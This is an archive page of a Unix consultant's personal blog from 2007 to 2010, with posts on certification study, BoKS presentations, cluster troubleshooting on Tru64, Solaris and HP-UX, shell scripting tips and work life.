View or add comments (curr. 0)

I spent a week in boot camp

2010-09-10 22:43:00

CISSP course books

You may recall that I started studying for my CISSP certification sometime in June. Since then I spent two months reading the 1200 page course book cover-to-cover, learning a lot of new things about the field of IT security. It was a chore getting through the book, but it's been very educational!

Last week I finally finished the last chapter, just in time for this week's "boot camp" week. Instead of using the five days of class learning things from scratch, I came prepared and only used the class to pinpoint any weak points in my knowledge and experience. Five days, forty hours of dry theory and many discussions later I now have a list of roughly 50 "TODO" items to tend to before my examination.

The exam is slated for the 13th of November and will take all of six hours. I'm actually a bit afraid that the remaining two months will be too long for me. I'll need a few weeks to kill all the "TODO" items, which will then leave me with a few more weeks before the exam. I could keep on cramming, I could get started on my next certs/studies, I could get some programming done, or I could simply unwind. I don't know... I'm afraid of letting all the info I've gathered slip from my head either way. tags: , ,

View or add comments (curr. 0)

Evaluation of my NLUUG presentation

2010-06-05 11:32:00

Wow, what a fright! Earlier this week I received an email from the NLUUG conference staff which contained the evaluation of all presentations. Mine was listed with the lowest grade of all at a sucky 5.0. What an awful scare! O-O

I had no clue what'd gone wrong. Sure, I'd talked too fast cutting the presentation short. And yeah, one guy'd told me it was a borderline sales pitch. But overall I thought things'd gone pretty well and I'd gotten some positive reactions!

Eager to hear what went wrong I asked the staff for some more details. Had visitors provided any specific, written feedback? This would of course be a prime learning opportunity! Well, unfortunately such a thing was not available. But! It turns out that, out of fifty attendants, only two people had actually filled out the evaluation. So my 5.0 was down to 4% of the attendants. *phew* That's a bit of a relief :)

On the 22nd I'll be repeating my presentation at the USN monthly get-together. Sounds like fun :) tags: ,

View or add comments (curr. 2)

NLUUG: we had a good day

2010-05-06 22:33:00

Ehhh. Ehhh... *shrug* I've got some mixed feelings about today.

While my presentation's reception was at least more than lukewarm, our exhibitor's booth was pretty damn quiet. It might've been the location, it might've been the backdrop, it might've been my suit... I dunno. I think we spoke to maybe ten people who weren't ex-colleagues or acquaintances of mine. So, nothing spectacular, but a good day nonetheless.

The great thing about today is that I finally got to meet Adri (a regular reader of my blog and a fellow father-of-a-1.5-year-old-girl) in person. *waves* Thank you very much for the great book you brought me Adri! It's awesome! ^_^ tags: , ,

View or add comments (curr. 1)

NLUUG: as ready as we'll be

2010-05-05 22:08:00

The Unixerius booth

Tomorrow's the big day! I'll be presenting at the NLUUG VJ-2010 convention, introducing the attendants to BoKS. I was told to expect a maximum of 80 people in my room, which is kind of reassuring.

Yesterday my colleague Kees and a friend of his built the Unixerius booth which looks smashing, although I personally think it's a bit overkill. I mean, we're bound to get a question like "Say, what's the name of your company again?" tags: , ,

View or add comments (curr. 3)

The trial went alright

2010-04-20 22:06:00

So, just as a short update: the trial of my BoKS presentation at Proxy went fine :)

I -love- their new office building, which is actually in a rather old, monumental building which has been restored and redecorated. Very nice! I was very anxious all day leading up to the talk, but when I was up there in front of the group everything came naturally. It really helps that I've already done the talk six or seven times, just by myself. It's made the story stick in my head.

Funnily enough I also met the gentleman who'll be gophering the room my talk at NLUUG will be in. :) tags: , ,

View or add comments (curr. 0)

A lesson I'd do well to learn

2010-04-16 05:52:00

... not because I'm going to work in Japan, but because even in the Netherlands it would be quite, quite helpful.

Quoting Hiko who is giving tips to survive in the Japanese workplace.

There are times in our lives that we have had the joy of letting rip with a phrase of self righteous condemnation like [this is bulls**t!]. Look back and remember those times. Savor them, and cherish them knowing that so long as you are in Japan and wish to remain employed and an unstigmatized non-social-outcast, you will never be able to have memories like ever that again, unless the story ends "and so then I was fired, and left Japan and overall I was a better person for the experience". Japan is a pathologically non-confrontational culture. All that bottled up indignation and rage tends to get released as passive aggression, or internalized into digestive-tract disorders. The best solution is to learn to undo your reflex to want to butt heads and learn how to resolve conflict the Japanese way. tags: , ,

View or add comments (curr. 4)

Practicing my presentation

2010-04-12 21:56:00

The big presentation at NLUUG is three weeks away and I've been practicing my presentation. Next week I'll do a preview / trial run at Proxy Services, to get into the groove. To be honest I'm quite anxious about the whole deal. *shudder* tags: ,

View or add comments (curr. 4)

Unix, BoKS and Nagios consulting

2009-10-25 18:28:00

I've been a Unix consultant in one form or another since the year 2000. Over those years I've gained expertise on the following subjects.

Thanks to the partnership between FoxT and my employer Unixerius I am an officially licensed BoKS consultant and trainer.

Other experience

Aside from my day-to-day Unix activities, I've also gained experience in the following fields:

Contacting me

I am currently employed by Unixerius, a small consulting firm in the Netherlands. We all specialize in one or two flavours of Unix and one or two additional fields (mine being monitoring and security). I am available for hire through Unixerius as I am not currently interested in going freelance.

You may also contact me directly.

For an overview of my work history, please visit my profile. tags: , ,

View or add comments (curr. 0)

Computer parlance - the divide between geeks and users

2009-10-18 17:59:00

I try to help out people with computer/network questions on various online fora, like Tweakers and One more thing. One of the things that frequently leads to both confusion and frustration is the divide between the parlance of true geeks and normal users.

For example, take this thread where people discuss the ins and outs of the UPC broadband service. Many, many times will one see frustration arise between the lesser experienced members and the veritable geeks regarding the usage of m/M and bit/byte.

As in:

* m versus M = mili versus mega = 10^-3 versus 10^6

* bit versus byte = 1 bit versus 8 bits

Normal folks will happily mix their m's and their M's and their bits and their bytes, not caring about the meaning of either. They reason according to the famous adage "Do what I mean, not what I say". So you'll frequently see things like:

Until two days ago I could happily download at a well-deserved 30mbits, which today fell to a miserable 5mbits. Then I rebooted the modem and now it's back up to 3.5mbits, so I R happy.

Does that sound confusing to you? Because to every true IT geek out there it does! So now there's dozens of folks like me berating the folks who keep mixing stuff up to "get it right because you're not making sense". Of course we are then in turn labeled as nitpicks (or "comma fornicators" as the dutch term would translate). The thing is, even though SI units are piecemeal to every (IT) geek, it seems that most "normal" people don't know all of them.

Sure, they know their milis from their centis and their kilos from their decas, but I don't think anyone in primary or high school usually deals with megas or anything bigger. Pretty odd, since you'd imagine that science class will cover stuff like megaWatts etc. A quick poll with Marli (who is otherwise a very intelligent AND computer-savy person) supports this idea: she knows "m", but not "M" and doesn't know the difference between a bit and a byte.

Ah, what're you going to do? I don't think this is a divide we'll quickly bridge, unless we unify to a completely new unit for measuring network speeds :) Might I suggest the "fruble"?


Mind you, I didn't write this just to rant. As an aspiring teacher I actually -do- wonder how one would best work around such a problem. Verbally there isn't any ambiguity because one would always say "mbit" or "megabit" in full. But in writing there's much room for laziness and confusion, as discussed above. So, what do you do as a teacher? Do you keep on hammering your students to adhere to the proper standards? To me, that does make much sense.


*sigh* Then again, if even the supposed "professionals" can't get it right, who are we to complain. Right? =_=;

UPC doesn't know their bits from their bytes tags: , , ,

View or add comments (curr. 5)

Open Coffee Almere, still fun and enjoyable

2009-10-01 18:47:00

Today's the first Thursday of the month, which means that it was time for another installment of Open Coffee Almere. It was our fifth get-together and I was glad to see about a dozen people show up. There were two other regulars, but the rest of'm were all new faces. One attendant even came down from the Leiden area!

I enjoyed myself tremendously and got to meet a few interesting people. The aforementioned gentleman does something really cool: he provides clinics where he combines lectures on champagne (the drink) with a certain message that management wants to convey to their colleagues. Say for example that a company would like to Go Green! (as they say). He would start the usual clinic about champagne and its many intricacies and then veer off towards ecological farming and how there's an analogy with what the company would like to achieve. I'm making a mess of explaining it, but it's really pretty cool -> Champagne Experience.

Today was the first time we'd gathered at the Tante Truus lunch room in town. I had no idea what to expect, so I was pleasantly surprised. The decor is lovely, the pie's great and the coffee awesome (they include a glass of water and a smidge of Baileys plus whipped cream with every coffee). I'd heartily recommend Truus for lunch or a break in the Almere Stad area. tags: ,

View or add comments (curr. 3)

Published three new BoKS admin scripts

2009-09-12 23:01:00

The past few months I've been working on some BoKS scripts. Let's say that my daily job's inspired me to write a number of scripts that I just -know- are going to be useful in any BoKS environment. I've got plenty ideas for both admin and monitoring scripts and finally I'm starting to see the fruits of my labour!

All of these scripts were written in my "own" time, so luckily I can do with them as I please. I've chosen to share all these scripts under the Creative Commons license which means that you can use them, change them and even re-use them as long as you attribute the original code to me. I guess it sounds a bit like the GPL.

Anywho, for now I've published three scripts, with more to come! All scripts can be found in the Sysadmin section of my site, in the menubar. So far there are:

1. boks_safe_dump, which creates database dumps for specific hosts and host groups.

2. boks_new_rootpw, which sets and verifies new passwords on root accounts.

3. check_boks_replication, a monitor script to make sure BoKS database replication works alright.

As they say in HHGTTG: Share and enjoy! tags: , , ,

View or add comments (curr. 1)

Working from home: scripting, BoKS and virtualization

2009-07-29 08:57:00

Given the fact that Marli can't currently provide the required care to Dana (due to her burnt hand), I've been working from home the past two days. With any luck Mar's hand will be healed by tonight and I'll get back to the office. In the mean time I've been scripting my ass off, getting more things done in two days than I usually do in a week. "I'm on a roll", as they say.

I had a list of five or six scripts that I wanted to write that work with FoxT's BoKS security software. Most of them are monitoring scripts that work with Tivoli (Nagios conversions coming up soon), with two sysadmin scripts to complete the set.

In order to test these scripts I'm setting up a test network, all with thanks to the wonders of Parallels Desktop. I admit that the 4GB of RAM in my Macbook is a bit anemic for running two Linux servers and a Solaris server, but it'll do for now. Maybe I ought to get a proper Powermac MacPro again. :)

Installing Solaris x86 in Parallels took a few tries, but I finally got it working, thanks to some tips found on the web.

* Give it a minimum of 512 MB RAM

* A small hard drive is fine, but don't set it to autoextend.

* Set 800x600 and 1024x768 as native display resolutions.

* Don't use the graphical/X11 installer, but go the console route.


This tutorial by Farhan Mashraqi was indispensable in getting the Realtek emulated network card to work under Solaris. tags: , ,

View or add comments (curr. 0)

Open Coffee networking event in Almere

2009-05-19 21:44:00

The Open Coffee Almere logo.

Taking a page out of the good book on Open Coffee networking events, I've decided to start one for Almere. Following the example of the original Open Coffee event, we'll gather every month (same Bat-time, same Bat-channel!) to meet new people over a cup of hot Java.

To get things going I've opened the Open Coffee Almere group at With a bit of luck we'll get a few dozen members soon.

To make the group stand out a little bit I've worked with InkScape for a few hours. By combining the Almere coat of arms with the common logo for most Dutch OC groups I think I've managed to create something unique. Besides, I didn't feel like re-using the same low-res image all the other groups use ;) By making the logo a vector image I've guaranteed that we can resize it to -any- size without loss of quality.


I've set up a simple Wordpress site at to act as a face to the masses. tags: , , ,

View or add comments (curr. 1)

Speaking of overtime...

2008-11-17 18:44:00

Speaking of overtime... Why is it that every time I try to implement a quick fix for a sucky SNAFU in our BoKS environment, I get stuck in the office at night? Every single fscking time! Case in point, last Friday I discovered a rather crappy mixup in our BoKS infrastructure. Nothing critical, but it was causing a lot of people discomfort nonetheless. I stayed late that day to troubleshoot the issue and to formulate a hypotheses on the required fixes.

Today I went over said fixes with my colleagues and at 1500 started the implementation of the first "quick fix". It was supposed to be done with within an hour, but I'm still stuck here. The replica server just doesn't want to do it's work and now I'm waiting for tech support to get back to me I'm looking at my twelfth hour on the job today and I'd really like to go home to Marli and Dana. Hacking and dining at the office just isn't as cool as it used to be. Now I have people to take care of... tags: , , ,

View or add comments (curr. 1)

Dabbling with SQL

2008-07-17 08:46:00

Bwahah, this is priceless :D

Yesterday I'd spent an hour or two writing a PHP+SQL script for one of my colleagues, so he could get his hands on the report he needed. We have this big database with statistics (gathered over the course of a year) and now it was a matter of getting the right info out of there. Let's say that what we wanted was the following:

For four quarters, per host, the total sum of the reported sizes of file systems.

Now, because my SQL skills aren't stellar what I did was create a FOR-loop on a "select distinct" of the hostnames from the table. Then, for each loop instance I'd "select sum(size)" to get the totals for one date. But because we wanted to know the totals for four quarters, said query was run four times with a different date. This means that to get my hands on said information I was running 168 * 4 = 672 queries in a row. All in all, it took our box fifteen minutes to come up with the final answer.

On my way to work this morning a thought struck me: I really ought to be able to do this with four queries, or even with -one-! What I want isn't that hard! And in a flash of insight it came to me!

SELECT hostname, date, SUM(size) AS total FROM vdisks WHERE (date="2007-10-03" OR date="2008-01-01" OR date="2008-04-01" OR date="2008-07-01") GROUP BY hostname, date;

The runtime of the total query has gone from 15 minutes, to 1 second. o_O

Holy shit :D I guess it -does- pay to optimize your queries and applications! tags: , , ,

View or add comments (curr. 0)

It's great to know one's work is appreciated

2008-06-03 15:05:00

Fuckin' A, man!

As the title of this post says: it's great to know that at least there's -someone- out there who appreciates the work you do :)

Case in point: I've been putting all my college term papers and summaries online and I've been keeping an extensive Wiki with class notes. From time to time a teacher or classmate will suggest that they've had some use for these sites, which is of course quite nice. But last night the aforementioned guidance counselor told me something that made me really happy ^_^

Next year she'll be teaching the second year's General didactics course. Because the course is currently given by one of our somewhat wishy-washy teachers, she was told that she'd have to hunt around and ask people for all the materials. I guess that most of the stuff was never really put to paper. Luckily Lisette knew about my site, found my summary and class notes and was done within a day. Her supervisor was perplexed! :D

So yeah, it's great to know that you're appreciated ^_^ tags: , , ,

View or add comments (curr. 2)

It's official: I'm job hunting as a teacher

2008-04-28 18:16:00

As the title suggests: I've officially started hunting for teaching positions for next school year. So far I've found a few very interesting schools that are actually quite close to home!

Let's see how this pans out.

Any of you Snowers reading this: no need to fret yet. I'm NOT running out on you on a moment's notice ;) tags: , , ,

View or add comments (curr. 3)

Networking for fun and profit

2008-04-28 13:36:00

Until recently I used to hate networking, the perceived obligation to talk business with people whom I had no interest in. Over the past year or so a realisation has been growing in me though: networking is something that happens automatically, to a certain degree. And you can make the parts that need to happen consciously as fun as they need to be.

Example 1: Like many young folks in IT I hated the idea of networking and actually tried to avoid it. I reckoned that I had no network whatsoever and didn't care about it that much either. However, after eight years of working in IT I realised that I -do- have a network and that it's rather expansive! My friend/colleague Deborah recently nudged me to get onto Linked In and I managed to map out a large part of my network with minor effort. That's 150 names right there, that I can tap into if I ever need help with my job, a technical question, or whatever. In case you're curious, here's my profile.

So yes, everyone has a network. Even you. All the people you have worked with, or for? Network! All the friends you made at that IT conference? Network! And so on...

Example 2: Sometimes you stumble upon stuff that peaks your interest. Case in point, I recently poked around in and wrote a review about Ephorus. The product is Europe's leading anti-plagiarism software and both the teacher and the sysadmin in me got curious as to its workings. I managed to get my hands on a trial account (not normally given to students) and tried it out. I liked it well enough.

Then a few days later followed an e-mail from their directory, asking if I'd like to come in for a talk. We had a great chat this morning, about Ephorus, about my work, about their work and just stuff in general. I had a great time and I even got a few -very- helpful suggestions that could help my career in the near future.

So you see? Networking consists of two things: the stuff you do every single day and just shooting the breeze with people you don't know. The third part, the obligational marketing talks to possible customers, I'll leave to the sales folks ~_^ tags: , , ,

View or add comments (curr. 1)

Interesting debate on work ethics

2008-02-23 15:55:00

Here's an interesting question for you: if we want our kids/students to put in effort in their work, why don't we do the same? Isn't that a bit two-faced?

Case in point: my own studies. It's been suggested a few times that I'm working myself into my grave at school, by putting so much effort into each and every assignment and report.

It's true that, for most of my reports, I put in extra research that isn't needed. Without said research I feel that I'm doing a half-assed job, because I wouldn't completely understand the subject matter. I enjoy studying extra materials from a field that I'm only in the process of entering, because without them I feel less confident. I've even been complimented on my efforts by a teacher or two.

However, now people (both teachers and fellow students) are suggesting that I could save a lot of time by skipping all that research. "Just find the answers to the questions and move on." "Don't bother with all those nice looking reports." "Do you really think someone's going to read a 25 page paper every time you submit one?"

Now, I'm not disregarding their suggestions, because it's certainly true that I could do with a little spare time. Too much work and no play and all that. So yes, I will start accepting 60-70% as a good score as well.

However, the problem I have with all of this is that we would -love- to have our students go apeshit over their course material! We'dn love it if they got totally enthused about maths, or english lit, or PE. So why are we so quick to jump to the "easy road" ourselves? That just feels illogical to me and actually a little bit like a betrayal as well. tags: , ,

View or add comments (curr. 1)

Installing additional locales on Tru64

2007-11-28 10:48:00

Wow, that was a fight :/

A few days ago we had a "new" TruCluster installed, running Tru64 5.1b. All of the stuff on it was plain vanilla, which meant that we were bound to run into some trouble. Case in point: the EMC/Legato Networker installation.

Upon installation setld complained as follows:


Your choice:

1 LGTOCLNT999 EMC NetWorker Client

cannot be installed as required subset IOSWWEURLOC??? is not available.


As the name suggests (EURLOC) the missing files involve the additional European locales that are not part of the default installation.

After fighting and searching and swearing a lot I got things sorted out as follows:

1. Get the Tru64 CD-ROM that was used for the installation. You'll need the "Associated Products 1" CD.

2. Insert the CD into your system.

3. Mount the CD: mount -r /dev/disk/cdrom1c /mnt

4. cd /mnt/Worldwide_Language_Support/kit

5. setld -l `pwd` IOSWWEURLOC540

This will install the locale I needed. Of course you are free to substitute the names of other locales as well.


Also, feel free to read through the proper instructions. tags: , , ,

View or add comments (curr. 1)

Sometimes clusters do not guarantee high uptime

2007-10-20 13:36:00

Oh me, oh my... Clustering software does not always guarantee high uptime :/

At $CLIENT we've been having some nasty problems with our development SAP box. The box is part of a Veritas cluster and actually runs a bunch of Solaris Zones. The problems originally started about two months ago when we ran into a rare and newly discovered bug in UFS. It took a while for us to get the proper patches, but we finally managed to get that sorted out.

Remco installed the patches on Thursday morning, though he ran into some trouble. As always, patches can give you crap when it comes to cross-dependencies and this time wasn't any different. Around lunch time we thought we had things sorted out and went for the final reboot. All the zones were transferred to the proper boxen and things looked okay.

Until we tried to make a network connection. D:

None of the zones had access to the network, even though their interfaces were up and running. We sought for hours, but couldn't find anything. And like us, Sun was in the dark as well. In the end Remco and Sun worked all night to get an answer. Unfortunately they didn't make it, so I took over in the morning. Lemme tell you, once I was in the middle of all the tech and the phone calls and the managers, I found some more respect for Remco. He did a great job all through Thursday!

Just before lunch both Sun and one of the other guys came up with the solution. That was an awesome coincidence :) Turns out that the problems we were having are caused by timing issues during the boot-up of the Solaris Zones. Because we let Veritas Cluster handle the network interfaces things turned sour. Things would've worked better if we'd let the Zone framework handle things.

The stopgap solution: freeze all cluster resources to prevent fail-over, then manually restart all virtual interfaces for the zones. And presto! It works again!

Happily we went to lunch, only to come back to more crap!

Turns out that the five SAP instances we were running wouldn't fit into the available swap space anymore. Weird! Before yesterday, things would barely fit in the 30GB of swap space. And now all of a sudden SAP would eat about 38GB! o_O WTF?!

A whole bunch of managers wanted us to work through the whole weekend to sort everything out. Naturally we didn't feel to enthused, let alone the fact that the box's SLA doesn't cover weekend work.

In the end we tacked on some temporary swap space, started SAP and left for the weekend. We'll have to take more downtime on Monday for granted. It also leaves us with two big things to fix:

1. Modify the cluster/zone config for the network interfaces.

2. Find out why SAP has grown gluttonous and fix it. tags: , ,

View or add comments (curr. 1)

Grappling with HP ServiceGuard

2007-08-01 15:26:00

Last night's planned change was supposed to last about two hours: get in, install some patches, switch some cluster resources around the nodes, install some more patches and get out. The fact that the installation involved a HP-UX system didn't get me down, even though we only work with Sun Solaris and Tru64. The fact that it involved a ServiceGuard cluster did make me a little apprehensive, but I felt confident that the procedures $CLIENT had supplied me would suffice.

Everything went great, until the 80% mark... Failing the applications back over to their original node failed for some reason and the cluster went into a wonky state. The cluster software told me everything was down, even though some of the software was obviously still running. The cluster wouldn't budge, not up, nor down. And that's when I found out that I rather dislike HP ServiceGuard, all because of one stupid flaw.

You see, all the other cluster software I know provides me with a proper listing of all the defined resources and their current state. Sun Cluster, Veritas Cluster Service and Tru Cluster? All of them are able to give me neat list of what's running where and why something went wrong. Well, not HP Damn ServiceGuard. Feh!

We ended up stopping the database manually and resetting all kinds of flags on the cluster software. Finally, after six hours (instead of the original two), I got off from work around 23:00. Yes... /me heartily dislikes HP ServiceGuard. tags: , , , ,

View or add comments (curr. 1)

Happy sysadmin day!

2007-07-27 10:55:00

It's the last Friday of July and you know what that means. It's Sysadmin Day, an international holiday on which end-users thank their admins for all their hard work! Or it would be, if anyone actually cared... *sigh* All I ever wanted was an STFU mug.

To all the sysadmins who -do- get some appreciation from their customers today: good on you! Enjoy your brief period in the lime light! ^_^ tags: , , ,

View or add comments (curr. 2)

Sun Fire V890: pretty, but with a nasty flaw

2007-07-17 10:12:00

The ports section of the V890.

Oy vey! One of the folks on the Sun Fire V890 must've been mesjoge! Why else would you decided to make such a weird design decision?!

What's up? I'll tell you what's up!

For some reason the design team decided to throw out the RJ45 console port that's been a Sun standard for nigh on ten years. And what did they replace it with? A DB25 port commonly seen in the Mesozoic Era! Good lord! This left me stranded without the proper cable for this morning's installation (thankfully I could borrow one). However, it also requires us to get completely new and different cables for our Cyclades console server!

Bad Sun! How could you make such a silly decision?! tags: , , , ,

View or add comments (curr. 5)

Training to be a safety steward

2007-06-24 10:24:00

A safety steward's jacket

Yesterday was a very well spent day! I may have been way too busy and I may have gotten way too little sleep, but it was damn well worth it. For yesterday was the first of two whole-day training sessions to become a BHV worker.

In dutch, BHV is an abbreviation for Bedrijfs HulpVerlener, which can be roughly translated as Company Safety Steward. In short, these are the people who are there to limit the scope of a disaster on the workfloor, while waiting for the professionals to arrive. They apply first aid, the guide an evacuation and they fight a starting fire. All in all a very important job!

Over here, in the Netherlands, every company is required by law to have BHVs on hand. Originally the law required a minimum of one BHV per fifty people, but these days it just calls for an appropriate amount. This means that it could be anything between 1:10 (retirement homes, hospitals) to 1:50 (office buildings). BHVs should be sufficiently trained a know how to prevent panic and/or casualties.

Yesterday's session focussed on an intro to BHV, communcations during an incident an on fighting fires. This also included fighting gas and petrol fires using CO2 and foam extinguishers. This was a truly awesome day!

Our training was delivered by the good fellows of TBT fire and medical. If you're looking for a good BHV training, give these guys a ring. tags: , ,

View or add comments (curr. 4)

The passing of an era: Nagios

2007-05-20 19:05:00

Well, I have finally unsubscribed myself from the Nagios mailing lists. It was great being a member of those lists while I was working with the software on a daily basis, but these days I've put Nagios behind me. I haven't written one line of Nagios monitoring code for months now.

I'm sure I'll also be skipping this year's Nagios Konferenz unless a job involving monitoring comes up again.

Thanks Ethan, for making such great software freely available! All the best to you and maybe we'll meet again o/ tags: , , , ,

View or add comments (curr. 0)

TruCluster: an interesting performance problem

2007-05-11 11:24:00

The past two weeks we've been having a rather mysterious problem with one of our TruClusters.

During hardware maintenance of the B-node we moved all cluster resources to the A-node to remain up and running. Afterwards we let TruCluster balance all the resources so performance would benefit again. Sounds good so far and everything kept on working like it should.

However, during some nights the A-node would slow to a crawl, not responding to any commands and inputs. We were stumped, because we simply couldn't find the cause of the problem. The system wasn't overloaded, with a low load average. The CPU load was a bit remarkable, with 10% user, 50% system and the rest in idle. The network wasn't overloaded and there was no traffic corruption. None of the disks were overloaded, with just two disks seeing moderate to heavy use. It was a mystery and we asked HP to help us out.

After some analysis they found the cause of the problem :) Part of one of the applications that was failed over to the A-node were two file systems. After the balancing of resources these file systems stuck with the A-node, while the application moved back to the B-node. So now the A-node was serving I/O to the B-node through its cluster interconnect! This also explains the high System Land CPU load, since that was the kernel serving the I/O. :D

We'll be moving the file systems back to the B-node as well and we'll see whether that solves the issues. It probably will :) tags: , , , ,

View or add comments (curr. 0)

Cutting down on the use of pipes

2007-04-18 14:38:00

One of the obvious down sides to using a scripting language like ksh as opposed to a "real" programming language like Perl or PHP (or C for that matter) is that, for each command that you string together, you're forking off a new process.

This isn't much of a problem when your script isn't too convoluted or when your dataset isn't too large. However, when you start processing 40-50MB log files with multiple FOR loops containing a few IF statements for each line, then you start running into performance issues.

And as I'm running into just that I'm trying to find ways to cut down on the forking, which means getting rid of as many IFs and pipes as possible. Here's a few examples of what has worked for me so far...

Instead of running:

[ expr1 ] && command1

[ expr2 ] && command1


[ (expr1) && (expr2) ] && command1

Why? Because if test works the way I expect it to, it'll die if the first expression is untrue, meaning that it won't even try the second expression. If you have multiple commands that complement eachother then you ought to be able to fit them into a set of parentheses after test cutting down on more forks.

Instead of running:

if [ `echo $STRING | grep $QUERY | wc -l` -gt 0 ]; then


if [ ! -z `echo $STRING | grep $QUERY` ]; then

More ideas to follow soon. Maybe I ought to start learning a "real" programming language? :D


OMG! I can't believe that I've just learnt this now, after eight years in the field! When using the Korn shell use [[ expr ]] for your tests as opposed to [ expr ].

Why? Because the [ expr ] is a throw-back to Bourne shell compatibility that makes use of the external test binary, as opposed to the built-in test function. This should speed up things considerably! tags: , , , ,

View or add comments (curr. 0)

On commenting and debugging your code

2007-04-16 16:38:00

When writing shell scripts for my customers I always try to be as clear as possible, allowing them to modify my code even long after I'm gone. In order to achieve this I usually provide a rather lengthy piece of opening comments, with comments add throughout the script for each subroutine and for every switch or command that may be unclear to the untrained eye.

In general I've found that it's best to have at least the following information in your opening blurb:

* Who made the program? When was it finalised? Who requested the script to be made? Where can the author be reached for questions?

* A "usage" line that shows the reader how to call the program and which parameters are at his disposal.

* A description of what the program actually does.

* Descriptions for each of the parameters and options that can be passed to the script.

* The limitations imposed upon the script. Which specific software is needed? What other requisites are there? What are the nasty little things that may pop up unexpectedly?

* What are the current bugs and faults? The so-called FIXMEs.

* A description of the input that the program takes.

* A description of the output that the program generates.

Equally important is the inclusion of debugging capabilities. Of course you can start adding "echo" lines at various, strategic points in the script when you run into problems, but it's oh-so-much nicer if they're already in there! Adding those new lines is usually a messy affair that can make your problems even worse :( I usually prepend the debugging commands with "[ $DEBUG -eq 1 ] &&", which allows me to turn the debugging on or off at the top of the script using one variable.

And finally, for the more involved scripts, it's a great idea to write a small test suite. Build a script that actually takes the real script through its loops by automatically generating input and by introducing errors.

Two examples of script where I did all of this are check_suncluster and check_log3 with the new on its way in a few days.

So far, checks in at:

* 497 lines in total.

* 306 lines of actual code.

* 136 lines of comments.

* 55 lines of debugging code.

Approximately 39% of this script exists solely for the benefit of the reader and user. tags: , , , ,

View or add comments (curr. 0)

w00t! Passed my LPIC-102!

2007-04-06 10:57:00

Yay! There wasn't much reason for my doubting :) I passed with a 690 score (on a 200-930 scale), which boils down to 87% of 73 questions answered correctly. Not bad... Not bad at all...

Next up: ITIL Foundations! tags: , , , ,

View or add comments (curr. 7)

LPIC-102 summary

2007-04-03 23:41:00

The LPIC-102 summary is done. You can find it over here, or in the menu on the left. Enjoy! tags: , , , , , ,

View or add comments (curr. 0)

Finally! I'm done!

2007-04-03 23:37:00

Calvin hard at work

Ruddy heck, what a day! All in all it took me around thirteen hours, but I've finally finished my LPIC-102 summary. 41 pages of Linuxy goodness, bound to drag me through the second part of my LPIC-1 exams.

Argh, now I'm off to bed. =_= *cough* Let's hope I don't get called for any stand-by work. tags: , , , ,

View or add comments (curr. 2)

Preparing for LPIC-102

2007-03-20 21:01:00

Cailin working hard

One of the rules my employer Snow imposes on its employees is a rather strict certification track. Technically speaking each employee progresses through five C-levels, starting at 0 and ending up at 4. As you reach new levels of certification you will also reap benefits of your hard work.

Let's take the track that applies to me as an example:

C0 = no certification

C1 = LPIC1 (101 and 102) and ITIL Fundamentals

C2 = LPIC2 (201 and 202)

C3 = SCSA1 and SCSA2

C4 = SCNA and others

The irony of the matter is that I've already achieved both SCSA exams and the SCNA exam a long time ago, but that I'm still stuck at C0 because I haven't done my LPICs. So to work myself up the ladder I'm slogging my way through the requisite LPIC stuff, even though I'm not that fond of Linux.

The challenge here lies in the fact that haven't used Linux in a professional environment that much, so I'm at a disadvantage when compared to the rest of my colleagues. I'm really glad I've always been a rather good student, so cramming with a few books should get me through. I managed to score a 660 (87%) at my LPIC-101, so that brings some hope :)

And now I'm cramming for the 102 exam! Since I was postponing it way too long, I reckoned I'd better get my act together! This week I took two days off to dedicate myself completely to studying. I managed to work through six of the nine objectives in these two days, resulting in a thirty-one page summary so far. In two weeks time I'll take another two days and then I'll be ready!

Like last time I'll post my summary over here, to help out all those other souls trundling through their LPICs. tags: , , ,

View or add comments (curr. 3)

Parallellization in shell scripts

2007-03-13 15:05:00

Today I was working on a shell script that's supposed to process multiple text files in the exact same manner. Usually you can get through this by running a FOR-loop where the code inside the loop is repeated for each file in a sequential manner.

Since this would take a lot of time (going over 1e6 lines of text in multiple passes) I wondered whether it wouldn't be possible to run the contents of the FOR-loop in parallel. I rehashed my script into the following form:



contents of old FOR-loop, using $FILE


for file in "list of files"



subroutine &


This will result in a new instance of your script for each file in the list. Got seven files to process? You'll end up with seven additional processes that are vying for the CPUs attention.

On average I've found that the performance of my shell script was improved by a factor of 2.5, going from ~40 lines per three seconds to ~100 lines. I was processing seven files in this case.

The only downside to this is that you're going to have to build in some additional code that prevents your shell script from running ahead, while the subroutines are running in the background. What this code needs to be fully depends on the stuff you're doing in the subroutine. tags: , , , ,

View or add comments (curr. 2)

Recovering a broken mirror in Tru64

2007-03-01 14:26:00

Today I faced the task of replacing a failing hard drive in one of our Tru64 boxen. The disk was part of a disk group being used to serve plain data (as opposed to being part of the boot mirror / rootdg), so the replacement should be rather simple.

After some poking about I came to the following procedure. Those in the know will recognize that it's very similar to how Veritas Volume Manager (VXVM) handles things. This is because Tru64 LSM is based on VXVM v2.

* voldiskadm -> option 4 -> list -> select the failing disk, this'll be used as $vmdisk below.

* voldisk list -> select the failing disk, this'll be used as $disk below.

* voldisk rm $disk

* Now replace the hard drive.

* hwmgr -show scsi -> take a note of your current set of disks.

* hwmgr -scan scsi

* hwmgr -show scsi -> the replaced disk should show up as a new disk at the bottom of the list. This'll be used as $newdisk below.

* dsfmgr -e $newdisk $disk

* disklabel -rw $disk

* voldisk list -> $disk should be labeled as "unknown" again.

* voldiskadm -> option 5 -> $vmdisk -> $disk -> y -> y -> your VM disk should now be replaced.

* volrecover -g $diskgroup -sb

The remirroring process will now start for all broken mirrors. Unfortunately there is no way of tracking the actual process. You can check whether the mirroring's still running with "volprint -ht -g $diskgroup | grep RECOV", but that's about it. tags: , , , ,

View or add comments (curr. 2)

I've never liked HP-UX that much ...

2007-02-21 12:47:00

I've never been overly fond of HP-UX, mostly sticking to Solaris and Mac OS X, with a few outings here and there. Given the nature of one of my current projects however, I am forced to delve into HP's own flavour of Unix.

You see, I'm building a script that will retrieve all manner of information regarding firmware levels, driver versions and such so we can start a networkwide upgrade of our SAN infrastructure. With most OSes I'm having a fairly easy time, but HP-UX takes the cake when it comes to being backwards :[

You see, if I want to find out the firmware level for a server running HP-UX I have two choices:

1. Reboot the system and check the firmware revision from the boot prompt.

2. Use the so-called Support Tools Manager utility, called [x,m,c]stm.

CSTM is the command line interface to STM and thank god that it's scriptable. In reality the binary is a CLI menu driven system, but it takes an input file for your commands.

For those who would like to retrieve their firmware version automatically, here's how:


Uhm... FSCK! *growl* *snarl* What the heck is this?! For some screwed up reason my shell keeps on adding a NewLine char after the output of each command. That way a variable which gets its value from a string of commands will always be "$VALUE ". WTF?! o_O

